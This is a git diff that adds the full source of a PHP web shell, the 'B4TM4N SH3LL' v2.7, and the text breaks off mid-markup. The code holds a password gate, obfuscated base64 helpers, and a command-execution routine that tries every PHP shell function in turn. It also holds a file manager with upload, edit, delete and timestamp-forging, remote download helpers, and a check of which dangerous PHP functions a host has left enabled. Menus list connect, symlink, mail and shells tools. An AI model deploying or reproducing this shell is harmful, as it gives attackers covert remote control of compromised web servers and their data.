diff --git a/php/bat_b4tm4n.php b/php/bat_b4tm4n.php new file mode 100644 index 0000000..1977089 --- /dev/null +++ b/php/bat_b4tm4n.php @@ -0,0 +1,3962 @@ + "B4TM4N SH3LL", // Your Title + "subtitle" => "V3RS10N 2.7 ~ k4mpr3t", // Your Subtitle + "themes" => "br34k", // Your Themes (D4RK or BR34K) + "debug" => false // Debug Mode +); + +$account=explode(':',$x_); + +session_start(); // Session Start + +function any($x,$y) +{ + return array_key_exists($x,$y); +} + +function urle($x) +{ + return B64E(urlencode($x)); +} + +function urld($x) +{ + return urldecode(B64D(urldecode($x))); +} + +define('_',DIRECTORY_SEPARATOR); + +foreach($_SERVER as $k => $v) +{ + define(strtolower($k),$_SERVER[$k]); +} + +function B64E($x) +{ + $d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; + $c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"; + $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4"; + $_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e"; + $b64=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m; + return strtr($b64($x),$d,$c); +} + +function B64D($x) +{ + $d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; + $c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"; + $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4"; + $_g="_";$_h="d";$_i="e";$_j="c";$_k="o";$_l="d";$_m="e"; + $b64=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m; + return $b64(strtr($x,$d,$c)); +} + +function error ($errno, $errstr, $errfile, $errline) +{ + switch ($errno) + { + case E_PARSE: + case E_STRICT:$errmsg='# DEBUG';break; + case E_NOTICE: + case E_USER_NOTICE:$errmsg='# NOTICE';break; + case E_USER_ERROR: + case E_RECOVERABLE_ERROR:$errmsg='# ERROR';break; + case E_WARNING: + case E_CORE_WARNING: + case E_COMPILE_WARNING: + case E_USER_WARNING:$errmsg='# WARNING';break; + case E_ERROR: + case E_CORE_ERROR: + case E_COMPILE_ERROR:$errmsg='# FATAL ERROR';break; + default:$errmsg='# UNKNOWN ERROR';break; + } + echo '
'; + echo $errmsg; + echo "
"; + echo $errstr; + echo "
"; + echo $errfile . ' (Line: ' . $errline . ')'; + echo "
"; + echo "
"; + echo "
"; +} + +// Login Request +if(request_method=="POST") +{ + if(any("username",$_REQUEST)&&any("password",$_REQUEST)&&any("signin",$_REQUEST)) + { + if((B64E($_REQUEST['username'])==$account[0])&&(sha1(md5($_REQUEST['password']))==$account[1])) + { + session_regenerate_id(); + $_SESSION['action']=array( + "username" => B64E($_REQUEST['username']), + "password" => sha1(md5($_REQUEST['password'])) + ); + } + else + { + // THIS IS FUCKING LOCAL DAMN LOG N00B! (https://github.com/k4mpr3t/b4tm4n/issues/5) + $log=array( + "Username: ".$_REQUEST['username'], + "Password: ".$_REQUEST['password'], + "Remote IP: ".remote_addr, + "Time: ".date('Y-m-d H:i:s'), + "-------------------------\r\n", + ); + $file=dirname(__FILE__)._.'.log'; + $write_log=implode($log,"\r\n"); + $op=fopen($file,'a+'); + fwrite($op,$write_log); + fclose($op); + } + } +} + +if(!any("action",$_SESSION)) +{ +?> + + + + + +Signin + + + + +
+

Please sign in

+ + + + + +

©

+
+ + + + + +<?=$title?> + + + + + + + + +
".$x."&1'; + if(!is_null($backtic=`$x`)) + { + return $backtic; + } + elseif(function_exists('system')) + { + ob_start(); + $system=system($x); + $buff=ob_get_contents(); + ob_end_clean(); + return $buff; + } + elseif(function_exists('exec')) + { + $buff=""; + exec($x,$results); + foreach($results as $result) + { + $buff.=$result; + } + return $buff; + } + elseif(function_exists('shell_exec')) + { + $buff=shell_exec($x); + return $buff; + } + elseif(function_exists('pcntl_exec')) + { + $buff=pcntl_exec($x); + return $buff; + } + elseif(function_exists('passthru')) + { + ob_start(); + $passthru=passthru($x); + $buff=ob_get_contents(); + ob_end_clean(); + return $buff; + } + elseif(function_exists('proc_open')) + { + $proc=proc_open($x,array( + array("pipe","r"), + array("pipe","w"), + array("pipe","w") + ),$pipes); + $buff=stream_get_contents($pipes[1]); + return $buff; + } + elseif(function_exists('popen')) + { + $buff=""; + $pop=popen($x,"r"); + while(!feof($pop)) + { + $buff.=fread($pop,1024); + } + pclose($pop); + return $buff; + } + return "R.I.P Command"; +} + +function Remove($x) +{ + if(is_dir($x)) + { + if($h=@opendir($x)) + { + while(false!==($f=readdir($h))) + { + if($f!="."&&$f!="..") + { + Remove($x._.$f); + } + } + closedir($h); + } + return rmdir($x); + } + elseif(is_file($x)) + { + return unlink($x); + } + return false; +} + +function ChmodRecursive($x,$y) +{ + if(is_dir($x)) + { + if($h=@opendir($x)) + { + while(false!==($f=readdir($h))) + { + if($f!="."&&$f!="..") + { + ChmodRecursive($x._.$f); + } + } + closedir($h); + } + return chmod($x,$y); + } + elseif(is_file($x)) + { + return chmod($x,$y); + } + return false; +} + +function CopyRecursive($x,$y) +{ + if(is_dir($x)) + { + @mkdir($y); + if($h=@opendir($x)) + { + while(false!==($f=readdir($h))) + { + if($f!="."&&$f!="..") + { + CopyRecursive($x._.$f,$y._.$f); + } + } + closedir($h); + } + return true; + } + elseif(is_file($x)) + { + return copy($x,$y); + } + return false; +} + +function MoveRecursive($x,$y) +{ + if(is_dir($x)) + { + @mkdir($y); + if($h=@opendir($x)) + { + while(false!==($f=readdir($h))) + { + if($f!="."&&$f!="..") + { + MoveRecursive($x._.$f,$y._.$f); + } + } + closedir($h); + } + return Remove($x); + } + elseif(is_file($x)) + { + if(copy($x,$y)) + { + return unlink($x); + } + } + return false; +} + +function GetDownloadUrl($x,$y) +{ + global $agent; + $fl=fopen($y,"w"); + $ch=curl_init(); + curl_setopt($ch,CURLOPT_USERAGENT,$agent); + curl_setopt($ch,CURLOPT_URL,$x); + curl_setopt($ch,CURLOPT_FILE,$fl); + curl_setopt($ch,CURLOPT_HEADER,0); + curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0); + curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); + curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); + $rs=curl_exec($ch); + if(curl_error($ch)) return curl_error($ch); + curl_close($ch); + fclose($fl); + return true; +} + +function GetUrlExists($x) +{ + global $agent; + $ch=curl_init(); + curl_setopt($ch,CURLOPT_USERAGENT,$agent); + curl_setopt($ch,CURLOPT_URL,$x); + curl_setopt($ch,CURLOPT_TIMEOUT,5); + curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + $rs=curl_exec($ch); + $http=curl_getinfo($ch,CURLINFO_HTTP_CODE); + if(curl_error($ch)) return curl_error($ch); + curl_close($ch); + return ($http>=200 && $http<300); +} + +function GetUrlContent($x) +{ + global $agent; + $ch=curl_init(); + curl_setopt($ch,CURLOPT_USERAGENT,$agent); + curl_setopt($ch,CURLOPT_URL,$x); + curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0); + curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + $rs=curl_exec($ch); + if(curl_error($ch)) return curl_error($ch); + curl_close($ch); + return $rs; +} + +function GetUrlFromPath($x) +{ + $fix_path=str_replace(_,'/',$x); + $protocol=empty($_SERVER['HTTPS'])||$_SERVER['HTTPS']==='off'?'http://':'https://'; + $path=str_replace(document_root,'',$fix_path); + return $protocol.server_name.$path; +} + +function PostUrlContent($url,$content) +{ + global $agent; + $params=array( + 'http' => array( + 'method' => "POST", + 'header' => "Content-Type: application/x-www-form-urlencoded\r\n". + "User-Agent: $agent\r\n", + 'content' => http_build_query($content) + ) + ); + $results=""; + $context=stream_context_create($params); + $header=get_headers($url); + if($http=substr($header[0],9,3) != "200") + { + $results="Error: $http"; + } + else + { + //file_get_contents + if($contents=file_get_contents($url,null,$context)) + { + $results=htmlspecialchars($contents); + } + + //stream_get_contents + if($handle=fopen($url,'r',false,$context)) + { + $contents=stream_get_contents($handle); + fclose($handle); + $results=htmlspecialchars($contents); + } + + //fopen + if($handle=fopen($url,'r',false,$context)) + { + $contents=""; + while(!feof($handle)) + { + $contents.=fread($handle,10240); + } + fclose($handle); + $results=htmlspecialchars($contents); + } + + } + return $results; +} + +function GetFileType($x) +{ + if(is_file($x)) + { + return pathinfo($x)['extension']; + } + elseif(is_dir($x)) + { + return "dir"; + } + elseif(is_link($x)) + { + return "link"; + } + else + { + return "-"; + } +} + +function GetFileTime($x,$y) +{ + switch($y) + { + case "create":return date("Y-m-d H:i:s",@filectime($x));break; + case "modify":return date("Y-m-d H:i:s",@filemtime($x));break; + case "access":return date("Y-m-d H:i:s",@fileatime($x));break; + } +} + +function GetFilePerm($x) +{ + $perms=@fileperms($x); + switch ($perms & 0xF000) + {case 0xC000:$info='s';break;case 0xA000:$info='l';break; + case 0x8000:$info='r';break;case 0x6000:$info='b';break; + case 0x4000:$info='d';break;case 0x2000:$info='c';break; + case 0x1000:$info='p';break;default:$info='u';} + $info .=(($perms & 0x0100)?'r':'-');$info .=(($perms & 0x0080)?'w':'-'); + $info .=(($perms & 0x0040)?(($perms & 0x0800)?'s':'x' ):(($perms & 0x0800)?'S':'-')); + $info .=(($perms & 0x0020)?'r':'-');$info .=(($perms & 0x0010)?'w':'-'); + $info .=(($perms & 0x0008)?(($perms & 0x0400)?'s':'x' ):(($perms & 0x0400)?'S':'-')); + $info .=(($perms & 0x0004)?'r':'-');$info .=(($perms & 0x0002)?'w':'-'); + $info .=(($perms & 0x0001)?(($perms & 0x0200)?'t':'x' ):(($perms & 0x0200)?'T':'-')); + return sprintf('%s [%s]',$info,substr(decoct($perms),2)); +} + +function GetFileSize($x) +{ + $x=abs($x); + $size=array('B','KB','MB','GB','TB','PB','EB','ZB','YB'); + $exp=$x?floor(log($x)/log(1024)):0; + return sprintf('%.2f '.$size[$exp],($x/pow(1024,floor($exp)))); +} + +function GetUser($x) +{ + if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')) + { + $uid=posix_getpwuid(posix_getuid()); + $gid=posix_getgrgid(posix_getgid()); + + switch($x) + { + case 'usr':return $uid['name'];break; + case 'uid':return $uid['uid'];break; + case 'grp':return $gid['name'];break; + case 'gid':return $gid['gid'];break; + } + } + else + { + switch($x) + { + case 'usr':return get_current_user();break; + case 'uid':return getmyuid();break; + case 'grp':return "?";break; + case 'gid':return getmygid();break; + } + } +} + +function GetOwnerGroup($x) +{ + if(Unix()) + { + if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')) + { + $user=posix_getpwuid(fileowner($x)); + $group=posix_getgrgid(filegroup($x)); + return sprintf('%s:%s',$user['name'],$group['name']); + } + } + return "?:?"; +} + +function GetFileOwnerGroup($x) +{ + if(Unix()) + { + if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')) + { + $user=posix_getpwuid(fileowner($x)); + $group=posix_getgrgid(filegroup($x)); + return sprintf('%s:%s/%s:%s',$user['name'],$user['uid'],$group['name'],$group['gid']); + } + } + return "?:?/?:?"; +} + +function GetSafeMode() +{ + if(strtolower(ini_get("safe_mode"))=='on') + { + $safemod="ON"; + } + else + { + $safemod="OFF"; + } + return $safemod; +} + +function MapDirectory($x) +{ + $map=""; + $d=str_replace("\\",_,$x); + if(empty($d)) + { + $d=realpath("."); + } + elseif(realpath($d)) + { + $d=realpath($d); + } + $d=str_replace("\\",_,$d); + if(substr($d,-1)!=_) + { + $d.=_; + } + $d=str_replace("\\\\","\\",$d); + $pd=$e=explode(_,substr($d,0,-1)); + $i=0; + foreach($pd as $b) + { + $t=""; + $j=0; + foreach($e as $r) + { + $t.=$r._; + if($j==$i) + { + break; + } + $j++; + } + $map.="".htmlspecialchars($b).""._; + $i++; + } + return rtrim($map,_); +} + +function MapDrive($x) +{ + if(!Unix()) + { + $v=explode("\\",$x); + $v=$v[0]; + $l=""; + foreach(range("A","Z") as $lt) + { + $drive=is_dir($lt.":\\"); + if($drive) + { + $l.="["; + if(strtolower($lt.':')!=strtolower($v)) + { + $l.=$lt; + } + else + { + $l.="".$lt.""; + } + $l.="]"; + } + } + return $l; + } +} + +function MainMenu() +{ + $menu=array( + "ExpL" => "?d=".urle(getcwd()), + "★ Sec." => "?x=secure", + "Info" => "?x=info", + "Database" => "?x=db", + "Terminal" => "?x=terminal", + "Connect" => "?x=connect", + ".Htaccess" => "?x=htaccess", + "PHP" => "?x=php", + "Perl/CGI" => "?x=perl", + "Mail" => "?x=mail", + "Process" => "?x=process", + "Shells" => "?x=shells", + "Symlink" => "?x=symlink", + "♛ Tools" => "?z", + "Account" => "?x=account", + "Update" => "?x=update", + "Logout" => "?x=logout" + ); + $nu=""; + foreach($menu as $key => $val) + { + $idxkey=substr($val,1,1); + $idxval=substr($val,3); + $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":""; + if($key=="Logout") + { + $nu.="
  • ".$key."
  • "; + } + else + { + $nu.="
  • ".$key."
  • "; + } + } + return $nu; +} + +function MenuTools($x) +{ + global $menu_tools; + $ol=""; + return $ol; +} + +printf(" +
    + + +
    ", + php_uname(),server_software, + server_name,server_name,gethostbyname(http_host),server_port, + B64D($account[0]),remote_addr,remote_port, + GetUser("usr"),GetUser("uid"),GetUser("grp"),GetUser("gid"), + GetFileSize(@disk_free_space($dir)),GetFileSize(@disk_total_space($dir)), + php_sapi_name(),GetSafeMode(),php_self,$config['title'],$config['subtitle'], + MainMenu(),MapDrive($map),MapDirectory($map),$map +); + +if(any("g",$_REQUEST)) +{ + $g=$_REQUEST['g']; + + if (is_dir($g)) + { + header('location:'.php_self.'?d='.urle($g)); + } + elseif(is_file($g)||is_link($g)) + { + header('location:'.php_self.'?a=v&r='.urle($g)); + } + else + { + header('location:'.php_self); + } +} + +if(any("d",$_REQUEST)||request_uri===script_name) +{ + $_SESSION['c']=urle($dir); + + if(any("file",$_REQUEST)&&$_REQUEST['file']=="New File") + { + $file=trim($dir._.$_REQUEST['what']); + + if(file_exists($file)) + { + printf("
    Can't create New File!
    "); + } + else + { + $mf=@fopen($file,"w"); + fclose($mf); + header("location:".php_self."?a=e&r=".urle($file)); + } + } + if(any("directory",$_REQUEST)&&$_REQUEST['directory']=="New Dir") + { + $dire=trim($_REQUEST['what']); + + @chdir($dir); + + if(!@mkdir($dire)) + { + printf("
    Can't create New Directory!
    "); + } + else + { + printf("
    Directory '%s' Created on %s
    ",$dire,GetFileTime($dir._.$dire,'create')); + } + } + if(any("upload",$_REQUEST)&&$_REQUEST['upload']=="Upload") + { + $upload=$dir._.trim(basename($_FILES["what"]["name"])); + + if(move_uploaded_file($_FILES["what"]["tmp_name"],$upload)) + { + printf("
    File %s has been uploaded
    ",basename($_FILES["what"]["name"])); + } + else + { + printf("
    ✕ Can't upload new file! ✕
    "); + } + } + if($handle=@opendir($dir)) + { + $reads=array(); + $count_dirs=0; + $count_files=0; + + while(false!==($file=readdir($handle))) + { + $filedir=rtrim($dir,_)._.$file; + $updir=substr($dir,0,strrpos($dir,_)); + if (strlen($updir)<=2) $updir=$updir._; + $type=GetFileType($filedir); + $size=GetFileSize(@filesize($filedir)); + $last=GetFileTime($filedir,"modify"); + $perm=GetFilePerm($filedir); + $owner=GetOwnerGroup($filedir); + $mime=@mime_content_type($filedir); + $view=""; + + if(strpos($mime,'image')!==false) + { + $view="?a=v&w=i&r=".urle($filedir); + } + elseif(strpos($mime,'video')!==false) + { + $view="?a=v&w=v&r=".urle($filedir); + } + elseif(strpos($mime,'audio')!==false) + { + $view="?a=v&w=a&r=".urle($filedir); + } + else + { + $view="?a=v&r=".urle($filedir); + } + + if($file==".") + { + $reads[]="
    .
    ".strtoupper($type)."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; + } + elseif($file=="..") + { + $reads[]="
    ".$file."
    ".strtoupper($type)."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; + } + else + { + if($type=="dir") + { + $reads[]="
    ".$file."
    ".strtoupper($type)."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; + $count_dirs++; + } + else + { + $reads[]="
    ".$file."
    ".strtoupper($type)."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; + $count_files++; + } + } + } + sort($reads); + $filesdirs=""; + foreach($reads as $read) + { + $filesdirs.=$read; + } + printf("
    + + + + + +
    + +
    + +
    + +
    + +
    +
    +
    +
    + + + + + + + + + + + + + + %s + + + + + +
    NameTypeSizePermsOwner:GroupModifiedAct.
    [0] Selected | Dir's: [%s] File's: [%s]
    + + +
    +
    ", + urle($dir), + urle($dir), + urle($dir), + $filesdirs, + $count_dirs, + $count_files + ); + closedir($handle); + } + else + { + print "
    Can't Open Location
    "; + } +} + +if(any("r",$_REQUEST)) +{ + if(file_exists(urld($_REQUEST["r"]))) + { + $file=strval(urld($_REQUEST["r"])); + $status=any("status",$_SESSION)?$_SESSION['status']:""; + $back=php_self."?d=".urle($dir); + + printf("
    +
    + + + + + + + +
    Name%s
    Size%s
    Permission%s
    Create time%s
    Last modified%s
    Last accessed%s
    +
    +
    + + + + + +
    MIME%s
    Owner/Group%s
    MD5%s
    SHA1%s
    +
    +
    ", + basename($file), + GetFileSize(@filesize($file)), + GetFilePerm($file), + GetFileTime($file,"create"), + GetFileTime($file,"modify"), + GetFileTime($file,"access"), + mime_content_type($file), + GetFileOwnerGroup($file), + @md5_file($file), + @sha1_file($file) + ); + + if(is_file($file)||is_link($file)) + { + $menu=array( + + "Back" => "?a=b&r=", + "Edit" => "?a=e&r=", + "View" => "?a=v&r=", + "Copy" => "?a=cp&r=", + "Move" => "?a=mv&r=", + "Download" => "?a=d&r=", + "Hexdump" => "?a=h&r=", + "Chmod" => "?a=c&r=", + "Chown" => "?a=cwn&r=", + "Chgrp" => "?a=cgp&r=", + "Touch" => "?a=t&r=", + "Rename" => "?a=r&r=", + "Delete" => "?a=x&r=" + ); + } + elseif(is_dir($file)) + { + $menu=array( + + "Back" => "?a=b&r=", + "Chmod" => "?a=c&r=", + "Chown" => "?a=cwn&r=", + "Chgrp" => "?a=cgp&r=", + "Touch" => "?a=t&r=", + "Rename" => "?a=r&r=", + "Delete" => "?a=x&r=" + ); + } + + $nu=""; + + foreach($menu as $key => $val) + { + $idxkey=substr($val,1,1); + $idxval=substr($val,3,strpos($val,'&')-3); + $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":""; + if($key=="Delete") + { + $nu.="
  • ".$key."
  • "; + } + elseif($key=="Back") + { + $nu.="
  • ".$key."
  • "; + } + else + { + $nu.="
  • ".$key."
  • "; + } + } + + printf("",$nu); + + if($_REQUEST['a']=='e') + { + $source=""; + + if(filesize($file) > 5242880) + { + $source.="Lazy to Read more than 5MB Files"; + } + else + { + $open=fopen($file,'r'); + + if($open) + { + while(!feof($open)) + { + $source.=htmlentities(fread($open,(1024*4))); + } + fclose($open); + } + } + + printf("
    + + + +
    ",$source,$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("save",$_REQUEST)) + { + $new_source=$_REQUEST['sourcecode']; + if(function_exists("chmod")) chmod($file,0755); + $source_edit=fopen($file,'w+'); + $tulis=fwrite($source_edit,$new_source); + fclose($source_edit); + if($tulis) + { + $_SESSION['status']="File Saved ! ".GetFileTime($file,"modify")." | ".GetFileSize(filesize($file)); + } + else + { + $_SESSION['status']="Whoops, something went wrong..."; + } + header("location:".php_self."?a=e&r=".urle($file)); + } + } + + if($_REQUEST['a']=='r') + { + printf("
    + + + +
    ",basename($file),$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("rename",$_REQUEST)) + { + $path=pathinfo(trim($file)); + $newname=$path['dirname']._.trim($_REQUEST['name']); + if(!rename(trim($file),$newname)) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Renamed file with success'; + } + header("location:".php_self."?a=r&r=".urle($newname)); + } + } + + if($_REQUEST['a']=='c') + { + printf("
    + + + +
    ",substr(decoct(fileperms($file)),2),$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("chmod",$_REQUEST)) + { + $octal=octdec($_REQUEST['octal']); + if(!chmod(trim($file),$octal)) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Chmod file with success'; + } + header("location:".php_self."?a=c&r=".urle($file)); + } + } + + if($_REQUEST['a']=='cwn') + { + $own=''; + if(function_exists('posix_getpwuid')) + { + $user=posix_getpwuid(fileowner($x)); + $own=$user['name']; + } + + printf("
    + + + +
    ",$own,$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("chown",$_REQUEST)) + { + $own=$_REQUEST['own']; + if(!chown(trim($file),$own)) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Chown file with success'; + } + header("location:".php_self."?a=cwn&r=".urle($file)); + } + } + + if($_REQUEST['a']=='cgp') + { + $grp=''; + if(function_exists('posix_getgrgid')) + { + $group=posix_getgrgid(filegroup($x)); + $grp=$group['name']; + } + + printf("
    + + + +
    ",$grp,$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("chgrp",$_REQUEST)) + { + $grp=$_REQUEST['grp']; + if(!chgrp(trim($file),$grp)) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Chgrp file with success'; + } + header("location:".php_self."?a=cgp&r=".urle($file)); + } + } + + if($_REQUEST['a']=='t') + { + printf("
    + + + +
    ",GetFileTime($file,"modify"),$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("touch",$_REQUEST)) + { + $time=$_REQUEST['time']; + if(!touch(trim($file),strtotime($time))) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Touched file with success'; + } + header("location:".php_self."?a=t&r=".urle($file)); + } + } + + if($_REQUEST['a']=='v') + { + printf("", + urle($file),urle($file), + urle($file),urle($file), + urle($file)); + + if(is_readable($file)) + { + if(any("w",$_REQUEST)) + { + $url=GetUrlFromPath($file); + $type=pathinfo($url)['extension']; + + if($_REQUEST['w']=='f') + { + printf("
    --> New Tab <--
    ",$url,$url); + } + + if($_REQUEST['w']=='i') + { + printf("
     Not Image
    ",$url); + } + + if($_REQUEST['w']=='v') + { + printf("
    ",$url,$type); + } + + if($_REQUEST['w']=='a') + { + printf("
    ",$url,$type); + } + } + else + { + if(filesize($file) > 5242880) + { + printf("Lazy to Read more than 5MB Files"); + } + else + { + $code=highlight_file($file,true); + printf("
    %s
    ",$code); + } + } + } + } + + if($_REQUEST['a']=='h') + { + $c=file_get_contents($file); + $n=0; + $h=array('00000000
    ','',''); + $len=strlen($c); + for($i=0;$i<$len;++$i) + { + $h[1].=sprintf('%02X',ord($c[$i])).' '; + switch(ord($c[$i])) + { + case 0: $h[2].=' ';break; + case 9: $h[2].=' ';break; + case 10:$h[2].=' ';break; + case 13:$h[2].=' ';break; + default:$h[2].=$c[$i];break; + } + $n++; + if($n==32) + { + $n=0; + if($i+1 < $len) + { + $h[0].=sprintf('%08X',$i+1).'
    '; + } + $h[1].='
    '; + $h[2].="\n"; + } + } + printf(" +
    + + + + + + +
    %s
    %s
    %s
    +
    ",$h[0],$h[1],htmlspecialchars($h[2])); + } + + if($_REQUEST['a']=='cp'||$_REQUEST['a']=='mv') + { + printf("
    + + + +
    ",$file,($_REQUEST['a']=='cp'?'Copy':'Move'),$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("submit",$_REQUEST)) + { + $source=$file; + $dest=$_REQUEST['file-dest']; + + if(!file_exists($dest)) + { + if ($_REQUEST['a']=='cp') + { + if(!copy(trim($source),trim($dest))) + { + $_SESSION['status']='Whoops, cannot copying...'; + } + else + { + $_SESSION['status']="Copy file with success '" . basename($dest) . "'"; + } + } + elseif($_REQUEST['a']=='mv') + { + if(!copy(trim($source),trim($dest))) + { + $_SESSION['status']='Whoops, cannot moving...'; + } + else + { + if(Remove($source)) + { + $_SESSION['status']="Move file with success"; + $file=$dest; + } + else + { + $_SESSION['status']='Whoops, just copying...'; + } + } + } + } + else + { + $_SESSION['status']="Whoops, File was Exists '" . basename($dest) . "'"; + } + + if($_REQUEST['a']=='cp') + { + header("location:".php_self."?a=cp&r=".urle($file)); + } + elseif($_REQUEST['a']=='mv') + { + header("location:".php_self."?a=mv&r=".urle($file)); + } + } + } + + if($_REQUEST['a']=='d') + { + if(file_exists($file)) + { + header('Cache-Control:must-revalidate,post-check=0,pre-check=0'); + header('Content-Disposition:attachment;filename='.basename($file)); + header('Content-Type:application/octet-stream'); + header('Content-Description:File Transfer'); + header('Content-Transfer-Encoding:binary'); + header('Content-Length:'.filesize($file)); + header('Pragma:public'); + header('Expires:0'); + ob_clean(); + readfile($file); + exit; + } + } + + if($_REQUEST['a']=='x') + { + if(file_exists($file)) + { + if(Remove($file)) + { + header("location:".$back); + } + } + + print 'Cannot Delete'; + } + } + else + { + print 'File Not Found'; + } +} + +if(any("x",$_REQUEST)) +{ + if($_REQUEST['x']=="logout") + { + session_destroy(); + session_regenerate_id(); + header('location:'.php_self); + } + if($_REQUEST['x']=="secure") + { + $disable_functions=array_filter(array_map('trim',explode(',',ini_get("disable_functions")))); + + $security=array('_xyec','allow_url_fopen','allow_url_include','apache_child_terminate','apache_get_modules','apache_getenv', + 'apache_note','apache_setenv','base64_decode','chdir','chgrp','chmod','chown','curl_exec','curl_multi_exec','dbase_open', + 'dbmopen','define_syslog_variables','disk_free_space','disk_total_space','diskfreespace','dl','dlopen','escapeshellarg', + 'escapeshellcmd','eval','exec','extract','filepro','filepro_retrieve','filepro_rowcount','fopen_with_path','fp','fput', + 'fputs','ftp_connect','ftp_exec','ftp_get','ftp_login','ftp_nb_fput','ftp_put','ftp_raw','ftp_rawlist','geoip_open', + 'get_cfg_var','get_current_user','get_num_redirects','getcwd','getenv','getlastmo','getmygid','getmyinode','getmypid', + 'getmyuid','getrusage','gzinflate','gzuncompress','highlight_file','hpAds_xmlrpcEncode','ini_alter','ini_get_all', + 'ini_restore','ini_set','inject_code','leak','link','listen','mainwork','mb_send_mail','mkdir','mkfifo','move_uploaded_file', + 'mysql_list_dbs','mysql_pconnect','openlog','parse_ini_file','passthru','pcntl_alarm','pcntl_exec','pcntl_fork', + 'pcntl_get_last_error','pcntl_getpriority','pcntl_setpriority','pcntl_signal','pcntl_signal_dispatch','pcntl_sigprocmask', + 'pcntl_sigtimedwait','pcntl_sigwaitinfo','pcntl_strerrorp','pcntl_wait','pcntl_waitpid','pcntl_wexitstatus','pcntl_wifexited', + 'pcntl_wifsignaled','pcntl_wifstopped','pcntl_wstopsig','pcntl_wtermsig','pfsockopen','phpAds_XmlRpc','phpAds_remoteInfo', + 'phpAds_xmlrpcDecode','phpAds_xmlrpcEncode','php_uname','phpinfo','popen','posix_getgrgid','posix_getlogin','posix_getpwuid', + 'posix_kill','posix_mkfifo','posix_setpgid','posix_setsid','posix_setuid','posix_ttyname','posix_uname','posixc','proc_close', + 'proc_get_stats','proc_get_status','proc_nice','proc_open','proc_terminate','ps_aux','putenv','readlink','rename','rmdir', + 'runkit_function_rename','set_time_limit','sh2_exec','shell_exec','show_source','sleep','socket_accept','socket_bind', + 'socket_clear_error','socket_close','socket_connect','socket_create','socket_create_listen','socket_create_pair', + 'socket_get_option','socket_getpeername','socket_getsockname','socket_last_error','socket_listen','socket_read', + 'socket_recv','socket_recvfrom','socket_select','socket_send','socket_sendto','socket_set_block','socket_set_nonblock', + 'socket_set_option','socket_shutdown','socket_strerror','socket_write','str_rot13','stream_select','stream_socket_server', + 'symlink','syslog','system','tp_exec','virtual','xmlrpc_entity_decode'); + + sort($security); + $fucks=array_unique(array_merge($disable_functions,$security)); + $table=""; + $enable=0; + $disable=0; + $die=array(); + $ready=array(); + $off=array(); + $total=count($fucks); + + foreach($fucks as $fuck) + { + $table.="$fuck"; + if(in_array($fuck,$disable_functions)) + { + $table.="
    DIE
    "; + $die[]=$fuck; + $disable++; + } + else + { + if(function_exists($fuck)||is_callable($fuck)) + { + $table.="
    READY
    "; + $ready[]=$fuck; + $enable++; + } + else + { + $table.="
    OFF
    "; + $off[]=$fuck; + $disable++; + } + } + $table.=""; + } + + $risk=($enable/$total)*100; + $secure=($disable/$total)*100; + + printf("

    Sec. Info v2.0.%s


    +

    Risks Rate [%s%%] | Secure Rate [%s%%]



    +
    + + + + + + + + + + %s + +
    No.Disable FunctionStatus
    +
    + Ready List + +
    +
    +
    +
    + Off List + +
    +
    +
    +
    + Die List + +
    +
    +
    ",$total,round($risk,2),round($secure,2),$table,implode($ready, ', '),implode($off, ', '),implode($die, ', ')); + } + if($_REQUEST['x']=="info") + { + printf("
    +
    + +
    +
    +
    +
